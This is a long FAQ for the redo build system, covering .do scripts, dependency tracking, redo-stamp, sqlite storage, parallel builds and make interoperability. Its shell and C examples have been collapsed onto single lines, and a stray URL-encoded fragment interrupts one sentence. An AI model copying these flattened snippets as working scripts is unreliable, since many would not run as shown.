My version of redo was written without ever seeing redo code by Bernstein or Grosskurth, so I own the entire copyright. It's distributed under the GNU LGPL version 2. You can find a copy of it in the file called LICENSE.

minimal/do is in the public domain so that it's even easier to include inside your own projects for people who don't have a copy of redo.

What's so special about redo?

The theory behind redo is almost magical: it can do everything make can do, only the implementation is vastly simpler, the syntax is cleaner, and you can do even more flexible things without resorting to ugly hacks. Also, you get all the speed of non-recursive make (only check dependencies once per run) combined with all the cleanliness of recursive make (you don't have code from one module stomping on code from another module).

(Disclaimer: my current implementation is not as fast as make for some things, because it's written in python. Eventually I'll rewrite it an C and it'll be very, very fast.)

The easiest way to show it is with an example.

Create a file called default.o.do:

redo-ifchange $2.c gcc -MD -MF $2.d -c -o $3 $2.c read DEPS <$2.d redo-ifchange ${DEPS#*:}

Create a file called myprog.do:

DEPS="a.o b.o" redo-ifchange $DEPS gcc -o $3 $DEPS

Of course, you'll also have to create a.c and b.c , the C language source files that you want to build to create your application.

In a.c:

#include <stdio.h> #include "b.h" int main() { printf(bstr); }

In b.h:

extern char *bstr;

In b.c:

char *bstr = "hello, world!\n";

Now you simply run:

$ redo myprog

And it says:

redo myprog redo a.o redo b.o

Now try this:

$ touch b.h $ redo myprog

Sure enough, it says:

redo myprog redo a.o

Did you catch the shell incantation in default.o.do where it generates the autodependencies? The filename default.o.do means "run this script to generate a .o file unless there's a more specific whatever.o.do script that applies."

The key thing to understand about redo is that declaring a dependency is just another shell command. The redo-ifchange command means, "build each of my arguments. If any of them or their dependencies ever change, then I need to run the current script over again."

Dependencies are tracked in a persistent .redo database so that redo can check them later. If a file needs to be rebuilt, it re-executes the whatever.do script and regenerates the dependencies. If a file doesn't need to be rebuilt, redo can calculate that just using its persistent .redo database, without re-running the script. And it can do that check just once right at the start of your project build.

But best of all, as you can see in default.o.do , you can declare a dependency after building the program. In C, you get your best dependency information by trying to actually build, since that's how you find out which headers you need. redo is based on the following simple insight: you don't actually care what the dependencies are before you build the target; if the target doesn't exist, you obviously need to build it. Then, the build script itself can provide the dependency information however it wants; unlike in make , you don't need a special dependency syntax at all. You can even declare some of your dependencies after building, which makes C-style autodependencies much simpler.

(GNU make supports putting some of your dependencies in include files, and auto-reloading those include files if they change. But this is very confusing - the program flow through a Makefile is hard to trace already, and even harder if it restarts randomly from the beginning when a file changes. With redo, you can just read the script from top to bottom. A redo-ifchange call is like calling a function, which you can also read from top to bottom.)

Does it make cross-platform builds easier?

A lot of build systems that try to replace make do it by trying to provide a lot of predefined rules. For example, one build system I know includes default rules that can build C++ programs on Visual C++ or gcc, cross-compiled or not cross-compiled, and so on. Other build systems are specific to ruby programs, or python programs, or Java or .Net programs.

redo isn't like those systems; it's more like make. It doesn't know anything about your system or the language your program is written in.

The good news is: redo will work with any programming language with about equal difficulty. The bad news is: you might have to fill in more details than you would if you just use ANT to compile a Java program.

So the short version is: cross-platform builds are about equally easy in make and redo. It's not any easier, but it's not any harder.

FIXME: Tools like automake are really just collections of Makefile rules so you don't have to write the same ones over and over. In theory, someone could write an automake-like tool for redo, and you could use that.

Hey, does redo even run on windows?

FIXME: Probably under cygwin. But it hasn't been tested, so no.

If I were going to port redo to Windows in a "native" way, I might grab the source code to a posix shell (like the one in MSYS) and link it directly into redo.

make also doesn't really run on Windows (unless you use MSYS or Cygwin or something like that). There are versions of make that do - like Microsoft's version - but their syntax is horrifically different from one vendor to another, so you might as well just be writing for a vendor-specific tool.

At least redo is simple enough that, theoretically, one day, I can imagine it being cross platform.

One interesting project that has appeared recently is busybox-w32 ( https://github.com/pclouds/busybox-w32 ). It's a port of busybox to win32 that includes a mostly POSIX shell (ash) and a bunch of standard Unix utilities. This might be enough to get your redo scripts working on a win32 platform without having to install a bunch of stuff. But all of this needs more experimentation.

One script per file? Can't I just put it all in one big Redofile like make does?

One of my favourite features of redo is that it doesn't add any new syntax; the syntax of redo is exactly the syntax of sh... because sh is the program interpreting your .do file.

Also, it's surprisingly useful to have each build script in its own file; that way, you can declare a dependency on just that one build script instead of the entire Makefile, and you won't have to rebuild everything just because of a one-line Makefile change. (Some build tools avoid that same problem by tracking which variables and commands were used to do the build. But that's more complex, more error prone, and slower.)

See djb's Target files depend on build scripts article for more information.

However, if you really want to, you can simply create a default.do that looks something like this:

case $1 in *.o) ...compile a .o file... ;; myprog) ...link a program... ;; *) echo "no rule to build '$1'" >&2; exit 1 ;; esac

Basically, default.do is the equivalent of a central Makefile in make. As of recent versions of redo, you can use either a single toplevel default.do (which catches requests for files anywhere in the project that don't have their own .do files) or one per directory, or any combination of the above. And you can put some of your targets in default.do and some of them in their own files. Lay it out in whatever way makes sense to you.

One more thing: if you put all your build rules in a single default.do, you'll soon discover that changing anything in that default.do will cause all your targets to rebuilt - because their .do file has changed. This is technically correct, but you might find it annoying. To work around it, try making your default.do look like this:

. ./default.od

And then put the above case statement in default.od instead. Since you didn't redo-ifchange default.od , changes to default.od won't cause everything to rebuild.

Can I set my dircolors to highlight .do files in ls output?

Yes! At first, having a bunch of .do files in each directory feels like a bit of a nuisance, but once you get used to it, it's actually pretty convenient; a simple 'ls' will show you which things you might want to redo in any given directory.

Here's a chunk of my .dircolors.conf:

.do 00;35 *Makefile 00;35 .o 00;30;1 .pyc 00;30;1 *~ 00;30;1 .tmp 00;30;1

To activate it, you can add a line like this to your .bashrc:

eval `dircolors $HOME/.dircolors.conf` What are the three parameters ($1, $2, $3) to a .do file?

NOTE: These definitions have changed since the earliest (pre-0.10) versions of redo. The new definitions match what djb's original redo implementation did.

$1 is the name of the target file.

$2 is the basename of the target, minus the extension, if any.

$3 is the name of a temporary file that will be renamed to the target filename atomically if your .do file returns a zero (success) exit code.

In a file called chicken.a.b.c.do that builds a file called chicken.a.b.c , $1 and $2 are chicken.a.b.c , and $3 is a temporary name like chicken.a.b.c.tmp . You might have expected $2 to be just chicken , but that's not possible, because redo doesn't know which portion of the filename is the "extension." Is it .c , .b.c , or .a.b.c ?

.do files starting with default. are special; they can build any target ending with the given extension. So let's say we have a file named default.c.do building a file called chicken.a.b.c . $1 is chicken.a.b.c , $2 is chicken.a.b , and $3 is a temporary name like chicken.a.b.c.tmp .

You should use $1 and $2 only in constructing input filenames and dependencies; never modify the file named by $1 in your script. Only ever write to the file named by $3. That way redo can guarantee proper dependency management and atomicity. (For convenience, you can write to stdout instead of $3 if you want.)

For example, you could compile a .c file into a .o file like this, from a script named default.o.do :

redo-ifchange $2.c gcc -o $3 -c $2.c Why not named variables like $FILE, $EXT, $OUT instead of $1, $2, $3?

That sounds tempting and easy, but one downside would be lack of backward compatibility with djb's original redo design.

Longer names aren't necessarily better. Learning the meanings of the three numbers doesn't take long, and over time, those extra few keystrokes can add up. And remember that Makefiles and perl have had strange one-character variable names for a long time. It's not at all clear that removing them is an improvement.

What happens to the stdin/stdout/stderr in a redo file?

As with make, stdin is not redirected. You're probably better off not using it, though, because especially with parallel builds, it might not do anything useful. We might change this behaviour someday since it's such a terrible idea for .do scripts to read from stdin.

As with make, stderr is also not redirected. You can use it to print status messages as your build proceeds. (Eventually, we might want to capture stderr so it's easier to look at the results of parallel builds, but this is tricky to do in a user-friendly way.)

Redo treats stdout specially: it redirects it to point at $3 (see previous question). That is, if your .do file writes to stdout, then the data it writes ends up in the output file. Thus, a really simple chicken.do file that contains only this:

echo hello world

will correctly, and atomically, generate an output file named chicken only if the echo command succeeds.

Isn't it confusing to have stdout go to the target by default?

Yes, it is. It's unlike what almost any other program does, especially make, and it's very easy to make a mistake. For example, if you write in your script:

echo "Hello world"

it will go to the target file rather than to the screen.

A more common mistake is to run a program that writes to stdout by accident as it runs. When you do that, you'll produce your target on $3, but it might be intermingled with junk you wrote to stdout. redo is pretty good about catching this mistake, and it'll print a message like this:

redo zot.do wrote to stdout *and* created $3. redo ...you should write status messages to stderr, not stdout. redo zot: exit code 207

Despite the disadvantages, though, automatically capturing stdout does make certain kinds of .do scripts really elegant. The "simplest possible .do file" can be very short. For example, here's one that produces a sub-list from a list:

redo-ifchange filelist grep ^src/ filelist

redo's simplicity is an attempt to capture the "Zen of Unix," which has a lot to do with concepts like pipelines and stdout. Why should every program have to implement its own -o (output filename) option when the shell already has a redirection operator? Maybe if redo gets more popular, more programs in the world will be able to be even simpler than they are today.

By the way, if you're running some programs that might misbehave and write garbage to stdout instead of stderr (Informational/status messages always belong on stderr, not stdout! Fix your programs!), then just add this line to the top of your .do script:

exec >&2

That will redirect your stdout to stderr, so it works more like you expect.

Can a *.do file itself be generated as part of the build process?

Not currently. There's nothing fundamentally preventing us from allowing it. However, it seems easier to reason about your build process if you aren't auto-generating your build scripts on the fly.

This might change someday.

Do end users have to have redo installed in order to build my project?

No. We include a very short and simple shell script called do in the minimal/ subdirectory of the redo project. do is like redo (and it works with the same *.do scripts), except it doesn't understand dependencies; it just always rebuilds everything from the top.

You can include do with your program to make it so non-users of redo can still build your program. Someone who wants to hack on your program will probably go crazy unless they have a copy of redo though.

Actually, redo itself isn't so big, so for large projects where it matters, you could just include it with your project.

How does redo store dependencies?

At the toplevel of your project, redo creates a directory named .redo . That directory contains a sqlite3 database with dependency information.

The format of the .redo directory is undocumented because it may change at any time. Maybe it will turn out that we can do something simpler than sqlite3. If you really need to make a tool that pokes around in there, please ask on the mailing list if we can standardize something for you.

Isn't using sqlite3 overkill? And un-djb-ish?

Well, yes. Sort of. I think people underestimate how "lite" sqlite really is:

root root 573376 2010-10-20 09:55 /usr/lib/libsqlite3.so.0.8.6

573k for a complete and very fast and transactional SQL database. For comparison, libdb is:

root root 1256548 2008-09-13 03:23 /usr/lib/libdb-4.6.so

...more than twice as big, and it doesn't even have an SQL parser in it! Or if you want to be really horrified:

root root 1995612 2009-02-03 13:54 /usr/lib/libmysqlclient.so.15.0.0

The mysql client library is two megs, and it doesn't even have a database server in it! People who think SQL databases are automatically bloated and gross have not yet actually experienced the joys of sqlite. SQL has a well-deserved bad reputation, but sqlite is another story entirely. It's excellent, and much simpler and better written than you'd expect.

But still, I'm pretty sure it's not very "djbish" to use a general-purpose database, especially one that has a SQL parser in it. (One of the great things about redo's design is that it doesn't ever need to parse anything, so a SQL parser is a bit embarrassing.)

I'm pretty sure djb never would have done it that way. However, I don't think we can reach the performance we want with dependency/build/lock information stored in plain text files; among other things, that results in too much fstat/open activity, which is slow in general, and even slower if you want to run on Windows. That leads us to a binary database, and if the binary database isn't sqlite or libdb or something, that means we have to implement our own data structures. Which is probably what djb would do, of course, but I'm just not convinced that I can do a better (or even a smaller) job of it than the sqlite guys did.

Most of the state database stuff has been isolated in state.py. If you're feeling brave, you can try to implement your own better state database, with or without sqlite.

It is almost certainly possible to do it much more nicely than I have, so if you do, please send it in!

Is it better to run redo-ifchange once per dependency or just once?

The obvious way to write a list of dependencies might be something like this:

for d in *.c; do redo-ifchange ${d%.c}.o done

But it turns out that's very non-optimal. First of all, it forces all your dependencies to be built in order (redo-ifchange doesn't return until it has finished building), which makes -j parallelism a lot less useful. And secondly, it forks and execs redo-ifchange over and over, which can waste CPU time unnecessarily.

A better way is something like this:

for d in *.c; do echo ${d%.c}.o done | xargs redo-ifchange

That only runs redo-ifchange once (or maybe a few times, if there are really a lot of dependencies and xargs has to split it up), which saves fork/exec time and allows for parallelism.

If a target didn't change, how do I prevent dependents from being rebuilt?

For example, running ./configure creates a bunch of files including config.h, and config.h might or might not change from one run to the next. We don't want to rebuild everything that depends on config.h if config.h is identical.

With make , which makes build decisions based on timestamps, you would simply have the ./configure script write to config.h.new, then only overwrite config.h with that if the two files are different. However, that's a bit tedious.

With redo , there's an easier way. You can have a config.do script that looks like this:

redo-ifchange autogen.sh *.ac ./autogen.sh ./configure cat config.h configure Makefile | redo-stamp

Now any of your other .do files can depend on a target called config . config gets rebuilt automatically if any of your autoconf input files are changed (or if someone does redo config to force it). But because of the call to redo-stamp, config is only considered to have changed if the contents of config.h, configure, or Makefile are different than they were before.

(Note that you might actually want to break this .do up into a few phases: for example, one that runs aclocal, one that runs autoconf, and one that runs ./configure. That way your build can always do the minimum amount of work necessary.)

What hash algorithm does redo-stamp use?

It's intentionally undocumented because you shouldn't need to care and it might change at any time. But trust me, it's not the slow part of your build, and you'll never accidentally get a hash collision.

Why not always use checksum-based dependencies instead of timestamps?

Some build systems keep a checksum of target files and rebuild dependents only when the target changes. This is appealing in some cases; for example, with ./configure generating config.h, it could just go ahead and generate config.h; the build system would be smart enough to rebuild or not rebuild dependencies automatically. This keeps build scripts simple and gets rid of the need for people to re-implement file comparison over and over in every project or for multiple files in the same project.

There are disadvantages to using checksums for everything automatically, however:

Building stuff unnecessarily is much less dangerous than not building stuff that should be built. Checksums aren't perfect (think of zero-byte output files); using checksums will cause more builds to be skipped by default, which is very dangerous.

It makes it hard to force things to rebuild when you know you absolutely want that. (With timestamps, you can just touch filename to rebuild everything that depends on filename .)

Targets that are just used for aggregation (ie. they don't produce any output of their own) would always have the same checksum - the checksum of a zero-byte file - which causes confusing results.

Calculating checksums for every output file adds time to the build, even if you don't need that feature.

Building stuff unnecessarily and then stamping it is much slower than just not building it in the first place, so for almost every use of redo-stamp, it's not the right solution anyway.

To steal a line from the Zen of Python: explicit is better than implicit. Making people think about when they're using the stamp feature - knowing that it's slow and a little annoying to do - will help people design better build scripts that depend on this feature as little as possible.

djb's (as yet unreleased) version of redo doesn't implement checksums, so doing that would produce an incompatible implementation. With redo-stamp and redo-always being separate programs, you can simply choose not to use them if you want to keep maximum compatibility for the future.

Bonus: the redo-stamp algorithm is interchangeable. You don't have to stamp the target file or the source files or anything in particular; you can stamp any data you want, including the output of ls or the content of a web page. We could never have made things like that implicit anyway, so some form of explicit redo-stamp would always have been needed, and then we'd have to explain when to use the explicit one and when to use the implicit one.

Thus, we made the decision to only use checksums for targets that explicitly call redo-stamp (see previous question).

I suggest actually trying it out to see how it feels for you. For myself, before there was redo-stamp and redo-always, a few types of problems (in particular, depending on a list of which files exist and which don't) were really annoying, and I definitely felt it. Adding redo-stamp and redo-always work the way they do made the pain disappear, so I stopped changing things.

Why does 'redo target' always redo the target, even if it's unchanged?

When you run make target , make first checks the dependencies of target; if they've changed, then it rebuilds target. Otherwise it does nothing.

redo is a little different. It splits the build into two steps. redo target is the second step; if you run that at the command line, it just runs the .do file, whether it needs it or not.

If you really want to only rebuild targets that have changed, you can run redo-ifchange target instead.

The reasons I like this arrangement come down to semantics:

"make target" implies that if target exists, you're done; conversely, "redo target" in English implies you really want to redo it, not just sit around.

If this weren't the rule, redo and redo-ifchange would mean the same thing, which seems rather confusing.

If redo could refuse to run a .do script, you would have no easy one-line way to force a particular target to be rebuilt. You'd have to remove the target and then redo it, which is more typing. On the other hand, nobody actually types "redo foo.o" if they honestly think foo.o doesn't need rebuilding.

For "contentless#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" targets like "test" or "clean", it would be extremely confusing if they refused to run just because they ran successfully last time.

In make, things get complicated because it doesn't differentiate between these two modes. Makefile rules with no dependencies run every time, unless the target exists, in which case they run never, unless the target is marked ".PHONY", in which case they run every time. But targets that do have dependencies follow totally different rules. And all this is needed because there's no way to tell make, "Listen, I just really want you to run the rules for this target right now ."

With redo, the semantics are really simple to explain. If your brain has already been fried by make, you might be surprised by it at first, but once you get used to it, it's really much nicer this way.

Can my .do files be written in a language other than sh?

Yes. If the first line of your .do file starts with the magic "#!/" sequence (eg. #!/usr/bin/python ), then redo will execute your script using that particular interpreter.

Note that this is slightly different from normal Unix execution semantics. redo never execs your script directly; it only looks for the "#!/" line. The main reason for this is so that your .do scripts don't have to be marked executable (chmod +x). Executable .do scripts would suggest to users that they should run them directly, and they shouldn't; .do scripts should always be executed inside an instance of redo, so that dependencies can be tracked correctly.

WARNING: If your .do script is written in Unix sh, we recommend not including the #!/bin/sh line. That's because there are many variations of /bin/sh, and not all of them are POSIX compliant. redo tries pretty hard to find a good default shell that will be "as POSIXy as possible," and if you override it using #!/bin/sh, you lose this benefit and you'll have to worry more about portability.

Can a single .do script generate multiple outputs?

FIXME: Yes, but this is a bit imperfect.

For example, compiling a .java file produces a bunch of .class files, but exactly which files? It depends on the content of the .java file. Ideally, we would like to allow our .do file to compile the .java file, note which .class files were generated, and tell redo about it for dependency checking.

However, this ends up being confusing; if myprog depends on foo.class, we know that foo.class was generated from bar.java only after bar.java has been compiled. But how do you know, the first time someone asks to build myprog, where foo.class is supposed to come from?

So we haven't thought about this enough yet.

Note that it's okay for a .do file to produce targets other than the advertised one; you just have to be careful. You could have a default.javac.do that runs 'javac $2.java', and then have your program depend on a bunch of .javac files. Just be careful not to depend on the .class files themselves, since redo won't know how to regenerate them.

This feature would also be useful, again, with ./configure: typically running the configure script produces several output files, and it would be nice to declare dependencies on all of them.

Recursive make is considered harmful. Isn't redo even more recursive?

You probably mean this 1997 paper by Peter Miller.

Yes, redo is recursive, in the sense that every target is built by its own .do file, and every .do file is a shell script being run recursively from other shell scripts, which might call back into redo . In fact, it's even more recursive than recursive make. There is no non-recursive way to use redo.

However, the reason recursive make is considered harmful is that each instance of make has no access to the dependency information seen by the other instances. Each one starts from its own Makefile, which only has a partial picture of what's going on; moreover, each one has to stat() a lot of the same files over again, leading to slowness. That's the thesis of the "considered harmful" paper.

It turns out that non-recursive make should also be considered harmful . The problem is Makefiles aren't very "hygienic" or "modular"; if you're not running make recursively, then your one copy of make has to know everything about everything in your entire project. Every variable in make is global, so every variable defined in any of your Makefiles is visible in all of your Makefiles. Every little private function or macro is visible everywhere. In a huge project made up of multiple projects from multiple vendors, that's just not okay. Plus, if all your Makefiles are tangled together, make has to read and parse the entire mess even to build the smallest, simplest target file, making it slow.

redo deftly dodges both the problems of recursive make and the problems of non-recursive make. First of all, dependency information is shared through a global persistent .redo database, which is accessed by all your redo instances at once. Dependencies created or checked by one instance can be immediately used by another instance. And there's locking to prevent two instances from building the same target at the same time. So you get all the "global dependency" knowledge of non-recursive make. And it's a binary file, so you can just grab the dependency information you need right now, rather than going through everything linearly.

Also, every .do script is entirely hygienic and traceable; redo discourages the use of global environment variables, suggesting that you put settings into files (which can have timestamps and dependencies) instead. So you also get all the hygiene and modularity advantages of recursive make.

By the way, you can trace any redo build process just by reading the .do scripts from top to bottom. Makefiles are actually a collection of "rules" whose order of execution is unclear; any rule might run at any time. In a non-recursive Makefile setup with a bunch of included files, you end up with lots and lots of rules that can all be executed in a random order; tracing becomes impossible. Recursive make tries to compensate for this by breaking the rules into subsections, but that ends up with all the "considered harmful" paper's complaints. redo runs your scripts from top to bottom in a nice tree, so it's traceable no matter how many layers you have.

How do I set environment variables that affect the entire build?

Directly using environment variables is a bad idea because you can't declare dependencies on them. Also, if there were a file that contained a set of variables that all your .do scripts need to run, then redo would have to read that file every time it starts (which is frequently, since it's recursive), and that could get slow.

Luckily, there's an alternative. Once you get used to it, this method is actually much better than environment variables, because it runs faster and it's easier to debug.

For example, djb often uses a computer-generated script called compile for compiling a .c file into a .o file. To generate the compile script, we create a file called compile.do :

redo-ifchange config.sh . ./config.sh echo "gcc -c -o \$3 $2.c $CFLAGS" >$3 chmod a+x $3

Then, your default.o.do can simply look like this:

redo-ifchange compile $2.c ./compile $1 $2 $3

This is not only elegant, it's useful too. With make, you have to always output everything it does to stdout/stderr so you can try to figure out exactly what it was running; because this gets noisy, some people write Makefiles that deliberately hide the output and print something friendlier, like "Compiling hello.c". But then you have to guess what the compile command looked like.

With redo, the command is ./compile hello.c , which looks good when printed, but is also completely meaningful. Because it doesn't depend on any environment variables, you can just run ./compile hello.c to reproduce its output, or you can look inside the compile file to see exactly what command line is being used.

As a bonus, all the variable expansions only need to be done once: when generating the ./compile program. With make, it would be recalculating expansions every time it compiles a file. Because of the way make does expansions as macros instead of as normal variables, this can be slow.

How do I write a default.o.do that works for both C and C++ source?

We can upgrade the compile.do from the previous answer to look something like this:

redo-ifchange config.sh . ./config.sh cat <<-EOF [ -e "\$2.cc" ] && EXT=.cc || EXT=.c gcc -o "\$3" -c "\$1\$EXT" -Wall $CFLAGS EOF chmod a+x "$3"

Isn't it expensive to have ./compile doing this kind of test for every single source file? Not really. Remember, if you have two implicit rules in make:

%.o: %.cc gcc ... %.o: %.c gcc ...

Then it has to do all the same checks. Except make has even more implicit rules than that, so it ends up trying and discarding lots of possibilities before it actually builds your program. Is there a %.s? A %.cpp? A %.pas? It needs to look for all of them, and it gets slow. The more implicit rules you have, the slower make gets.

In redo, it's not implicit at all; you're specifying exactly how to decide whether it's a C program or a C++ program, and what to do in each case. Plus you can share the two gcc command lines between the two rules, which is hard in make. (In GNU make you can use macro functions, but the syntax for those is ugly.)

Can I just rebuild a part of the project?

Absolutely! Although redo runs "top down" in the sense of one .do file calling into all its dependencies, you can start at any point in the dependency tree that you want.

Unlike recursive make, no matter which subdir of your project you're in when you start, redo will be able to build all the dependencies in the right order.

Unlike non-recursive make, you don't have to jump through any strange hoops (like adding, in each directory, a fake Makefile that does make -C ${TOPDIR} back up to the main non-recursive Makefile). redo just uses filename.do to build filename , or uses default*.do if the specific filename.do doesn't exist.

When running any .do file, redo makes sure its current directory is set to the directory where the .do file is located. That means you can do this:

redo ../utils/foo.o

And it will work exactly like this:

cd ../utils redo foo.o

In make, if you run

make ../utils/foo.o

it means to look in ./Makefile for a rule called ../utils/foo.o... and it probably doesn't have such a rule. On the other hand, if you run

cd ../utils make foo.o

it means to look in ../utils/Makefile and look for a rule called foo.o. And that might do something totally different! redo combines these two forms and does the right thing in both cases.

Note: redo will always change to the directory containing the .do file before trying to build it. So if you do

redo ../utils/foo.o

the ../utils/default.o.do file will be run with its current directory set to ../utils. Thus, the .do file's runtime environment is always reliable.

On the other hand, if you had a file called ../default.o.do, but there was no ../utils/default.o.do, redo would select ../default.o.do as the best matching .do file. It would then run with its current directory set to .., and tell default.o.do to create an output file called "utils/foo.o" (that is, foo.o, with a relative path explaining how to find foo.o when you're starting from the directory containing the .do file).

That sounds a lot more complicated than it is. The results are actually very simple: if you have a toplevel default.o.do, then all your .o files will be compiled with $PWD set to the top level, and all the .o filenames passed as relative paths from $PWD. That way, if you use relative paths in -I and -L gcc options (for example), they will always be correct no matter where in the hierarchy your source files are.

Can I put my .o files in a different directory from my .c files?

Yes. There's nothing in redo that assumes anything about the location of your source files. You can do all sorts of interesting tricks, limited only by your imagination. For example, imagine that you have a toplevel default.o.do that looks like this:

ARCH=${1#out/} ARCH=${ARCH%%/*} SRC=${1#out/$ARCH/} redo-ifchange $SRC.c $ARCH-gcc -o $3 -c $SRC.c

If you run redo out/i586-mingw32msvc/path/to/foo.o , then the above script would end up running

i586-mingw32msvc-gcc -o $3 -c path/to/foo.c

You could also choose to read the compiler name or options from out/$ARCH/config.sh, or config.$ARCH.sh, or use any other arrangement you want.

You could use the same technique to have separate build directories for out/debug, out/optimized, out/profiled, and so on.

Can my filenames have spaces in them?

Yes, unlike with make. For historical reasons, the Makefile syntax doesn't support filenames with spaces; spaces are used to separate one filename from the next, and there's no way to escape these spaces.

Since redo just uses sh, which has working escape characters and quoting, it doesn't have this problem.

Does redo care about the differences between tabs and spaces?

No.

What if my .c file depends on a generated .h file?

This problem arises as follows. foo.c includes config.h, and config.h is created by running ./configure. The second part is easy; just write a config.h.do that depends on the existence of configure (which is created by configure.do, which probably runs autoconf).

The first part, however, is not so easy. Normally, the headers that a C file depends on are detected as part of the compilation process. That works fine if the headers, themselves, don't need to be generated first. But if you do

redo foo.o

There's no way for redo to automatically know that compiling foo.c into foo.o depends on first generating config.h.

Since most .h files are not auto-generated, the easiest thing to do is probably to just add a line like this to your default.o.do:

redo-ifchange config.h

Sometimes a specific solution is much easier than a general one.

If you really want to solve the general case, djb has a solution for his own projects , which is a simple script that looks through C files to pull out #include lines. He assumes that #include <file.h> is a system header (thus not subject to being built) and #include "file.h" is in the current directory (thus easy to find). Unfortunately this isn't really a complete solution, but at least it would be able to redo-ifchange a required header before compiling a program that requires that header.

Why doesn't redo by default print the commands as they are run?

make prints the commands it runs as it runs them. redo doesn't, although you can get this behaviour with redo -v or redo -x . (The difference between -v and -x is the same as it is in sh... because we simply forward those options onward to sh as it runs your .do script.)

The main reason we don't do this by default is that the commands get pretty long winded (a compiler command line might be multiple lines of repeated gibberish) and, on large projects, it's hard to actually see the progress of the overall build. Thus, make users often work hard to have make hide the command output in order to make the log "more readable."

The reduced output is a pain with make, however, because if there's ever a problem, you're left wondering exactly what commands were run at what time, and you often have to go editing the Makefile in order to figure it out.

With redo, it's much less of a problem. By default, redo produces output that looks like this:

$ redo t redo t/all redo t/hello redo t/LD redo t/hello.o redo t/CC redo t/yellow redo t/yellow.o redo t/bellow redo t/c redo t/c.c redo t/c.c.c redo t/c.c.c.b redo t/c.c.c.b.b redo t/d

The indentation indicates the level of recursion (deeper levels are dependencies of earlier levels). The repeated word "redo" down the left column looks strange, but it's there for a reason, and the reason is this: you can cut-and-paste a line from the build script and rerun it directly.

$ redo t/c redo t/c redo t/c.c redo t/c.c.c redo t/c.c.c.b redo t/c.c.c.b.b

So if you ever want to debug what happened at a particular step, you can choose to run only that step in verbose mode:

$ redo t/c.c.c.b.b -x redo t/c.c.c.b.b * sh -ex default.b.do c.c.c.b .b c.c.c.b.b.redo2.tmp + redo-ifchange c.c.c.b.b.a + echo a-to-b + cat c.c.c.b.b.a + ./sleep 1.1 redo t/c.c.c.b.b (done)

If you're using an autobuilder or something that logs build results for future examination, you should probably set it to always run redo with the -x option.

Is redo compatible with autoconf?

Yes. You don't have to do anything special, other than the above note about declaring dependencies on config.h, which is no worse than what you would have to do with make.

Is redo compatible with automake?

Hells no. You can thank me later. But see next question.

Is redo compatible with make?

Yes. If you have an existing Makefile (for example, in one of your subprojects), you can just call make from a .do script to build that subproject.

In a file called myproject.stamp.do:

redo-ifchange $(find myproject -name '*.[ch]') make -C myproject all

So, to amend our answer to the previous question, you can use automake-generated Makefiles as part of your redo-based project.

Is redo -j compatible with make -j?

Yes! redo implements the same jobserver protocol as GNU make, which means that redo running under make -j, or make running under redo -j, will do the right thing. Thus, it's safe to mix-and-match redo and make in a recursive build system.

Just make sure you declare your dependencies correctly; redo won't know all the specific dependencies included in your Makefile, and make won't know your redo dependencies, of course.

One way of cheating is to just have your make.do script depend on all the source files of a subproject, like this:

make -C subproject all find subproject -name '*.[ch]' | xargs redo-ifchange

Now if any of the .c or .h files in subproject are changed, your make.do will run, which calls into the subproject to rebuild anything that might be needed. Worst case, if the dependencies are too generous, we end up calling 'make all' more often than necessary. But 'make all' probably runs pretty fast when there's nothing to do, so that's not so bad.

Parallelism if more than one target depends on the same subdir

Recursive make is especially painful when it comes to parallelism. Take a look at this Makefile fragment:

all: fred bob subproj: touch $@.new sleep 1 mv $@.new $@ fred: $(MAKE) subproj touch $@ bob: $(MAKE) subproj touch $@

If we run it serially, it all looks good:

$ rm -f subproj fred bob; make --no-print-directory make subproj touch subproj.new sleep 1 mv subproj.new subproj touch fred make subproj make[1]: 'subproj' is up to date. touch bob

But if we run it in parallel, life sucks:

$ rm -f subproj fred bob; make -j2 --no-print-directory make subproj make subproj touch subproj.new touch subproj.new sleep 1 sleep 1 mv subproj.new subproj mv subproj.new subproj mv: cannot stat 'ubproj.new': No such file or directory touch fred make[1]: *** [subproj] Error 1 make: *** [bob] Error 2

What happened? The sub-make that runs subproj ended up getting twice at once, because both fred and bob need to build it.

If fred and bob had put in a dependency on subproj, then GNU make would be smart enough to only build one of them at a time; it can do ordering inside a single make process. So this example is a bit contrived. But imagine that fred and bob are two separate applications being built from the same toplevel Makefile, and they both depend on the library in subproj. You'd run into this problem if you use recursive make.

Of course, you might try to solve this by using nonrecursive make, but that's really hard. What if subproj is a library from some other vendor? Will you modify all their makefiles to fit into your nonrecursive makefile scheme? Probably not.

Another common workaround is to have the toplevel Makefile build subproj, then fred and bob. This works, but if you don't run the toplevel Makefile and want to go straight to work in the fred project, building fred won't actually build subproj first, and you'll get errors.

redo solves all these problems. It maintains global locks across all its instances, so you're guaranteed that no two instances will try to build subproj at the same time. And this works even if subproj is a make-based project; you just need a simple subproj.do that runs make subproj .

Dependency problems that only show up during parallel builds

One annoying thing about parallel builds is... they do more things in parallel. A very common problem in make is to have a Makefile rule that looks like this:

all: a b c

When you make all , it first builds a, then b, then c. What if c depends on b? Well, it doesn't matter when you're building in serial. But with -j3, you end up building a, b, and c at the same time, and the build for c crashes. You should have said:

all: a b c c: b b: a

and that would have fixed it. But you forgot, and you don't find out until you build with exactly the wrong -j option.

This mistake is easy to make in redo too. But it does have a tool that helps you debug it: the --shuffle option. --shuffle takes the dependencies of each target, and builds them in a random order. So you can get parallel-like results without actually building in parallel.

What about distributed builds?

FIXME: So far, nobody has tried redo in a distributed build environment. It surely works with distcc, since that's just a distributed compiler. But there are other systems that distribute more of the build process to other machines.

The most interesting method I've heard of was explained (in public, this is not proprietary information) by someone from Google. Apparently, the Android team uses a tool that mounts your entire local filesystem on a remote machine using FUSE and chroots into that directory. Then you replace the $SHELL variable in your copy of make with one that runs this tool. Because the remote filesystem is identical to yours, the build will certainly complete successfully. After the $SHELL program exits, the changed files are sent back to your local machine. Cleverly, the files on the remote server are cached based on their checksums, so files only need to be re-sent if they have changed since last time. This dramatically reduces bandwidth usage compared to, say, distcc (which mostly just re-sends the same preparsed headers over and over again).

At the time, he promised to open source this tool eventually. It would be pretty fun to play with it.

The problem:

This idea won't work as easily with redo as it did with make. With make, a separate copy of $SHELL is launched for each step of the build (and gets migrated to the remote machine), but make runs only on your local machine, so it can control parallelism and avoid building the same target from multiple machines, and so on. The key to the above distribution mechanism is it can send files to the remote machine at the beginning of the $SHELL, and send them back when the $SHELL exits, and know that nobody cares about them in the meantime. With redo, since the entire script runs inside a shell (and the shell might not exit until the very end of the build), we'd have to do the parallelism some other way.

